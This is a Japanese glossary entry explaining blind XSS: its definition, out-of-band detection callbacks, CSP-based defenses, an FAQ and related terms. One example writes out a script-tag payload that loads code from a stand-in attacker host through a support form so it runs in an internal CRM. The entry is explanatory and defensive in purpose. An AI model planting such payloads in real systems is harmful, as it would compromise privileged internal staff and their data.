ブラインド XSS
ブラインド XSS とは何ですか?
ブラインド XSS格納型 XSS の一種で、ペイロードが攻撃者から直接見えないコンテキスト(社内管理画面など)で発火するもの。
ブラインド XSS は格納型 XSS の派生形で、悪意あるスクリプトは攻撃者のブラウザではなく、サポートチケット表示画面、不正検知コンソール、社内ダッシュボード、バックアップレポートなど、別の(多くは特権的な)コンテキストで実行されます。攻撃者は問い合わせフォーム・登録・サポート依頼などの公開フォームからペイロードを送信し、内部ユーザがその保存データを表示するのを待ちます。検知にはアウトオブバンドのコールバックが用いられ、ペイロードは XSS Hunter、Burp Collaborator、自前の DNS/HTTP サーバへ情報を送出してスクリプトの実行場所を明らかにします。防御は格納型 XSS と同様で、管理ツールには厳格な CSP の適用が推奨されます。
● 例
- 01
サポートフォームの入力欄に <script src=https://x.attacker/x.js></script> を含め、エージェントの CRM で発火させる。
- 02
管理ログ閲覧画面に取り込まれた User-Agent ヘッダーが HTML エスケープされずに実行される。
● よくある質問
ブラインド XSS とは何ですか?
格納型 XSS の一種で、ペイロードが攻撃者から直接見えないコンテキスト(社内管理画面など)で発火するもの。 サイバーセキュリティの 攻撃と脅威 カテゴリに属します。
ブラインド XSS とはどういう意味ですか?
格納型 XSS の一種で、ペイロードが攻撃者から直接見えないコンテキスト(社内管理画面など)で発火するもの。
ブラインド XSS はどのように機能しますか?
ブラインド XSS は格納型 XSS の派生形で、悪意あるスクリプトは攻撃者のブラウザではなく、サポートチケット表示画面、不正検知コンソール、社内ダッシュボード、バックアップレポートなど、別の(多くは特権的な)コンテキストで実行されます。攻撃者は問い合わせフォーム・登録・サポート依頼などの公開フォームからペイロードを送信し、内部ユーザがその保存データを表示するのを待ちます。検知にはアウトオブバンドのコールバックが用いられ、ペイロードは XSS Hunter、Burp Collaborator、自前の DNS/HTTP サーバへ情報を送出してスクリプトの実行場所を明らかにします。防御は格納型 XSS と同様で、管理ツールには厳格な CSP の適用が推奨されます。
ブラインド XSS からどのように防御しますか?
ブラインド XSS に対する防御は通常、上記の定義で述べたとおり、技術的統制と運用上の実践を組み合わせます。
ブラインド XSS の別名は何ですか?
一般的な別名: アウトオブバンド XSS。
● 関連用語
- attacks№ 240
クロスサイトスクリプティング(XSS)
他のユーザーが閲覧するページに悪意あるスクリプトを注入し、当該サイトのオリジンとして被害者のブラウザで実行させる Web 脆弱性。
- attacks№ 1107
格納型 XSS
攻撃者が送り込んだスクリプトがサーバ側に保存され、ページを閲覧したすべてのユーザのブラウザで実行される永続型クロスサイトスクリプティング。
- attacks№ 912
反射型 XSS
攻撃者が制御するリクエストパラメータが即時にレスポンスへ反映され、被害者のブラウザで実行される非永続型 XSS。
- attacks№ 347
DOM ベース XSS
クライアントサイドの JavaScript が信頼できないデータをサニタイズせずに DOM シンクへ書き込むことで、注入と実行がすべてブラウザ内で完結する XSS。
- appsec№ 214
コンテンツセキュリティポリシー (CSP)
スクリプト・スタイル・フレームなどの読み込み元をブラウザに指示する HTTP レスポンスヘッダで、XSS やデータ注入攻撃の影響を抑える。
- appsec№ 773
出力エンコーディング
信頼できないデータを HTML・JavaScript・URL・SQL・シェルなど特定の出力コンテキストで安全な形式に変換し、コードとして実行されるのを防ぐ処理。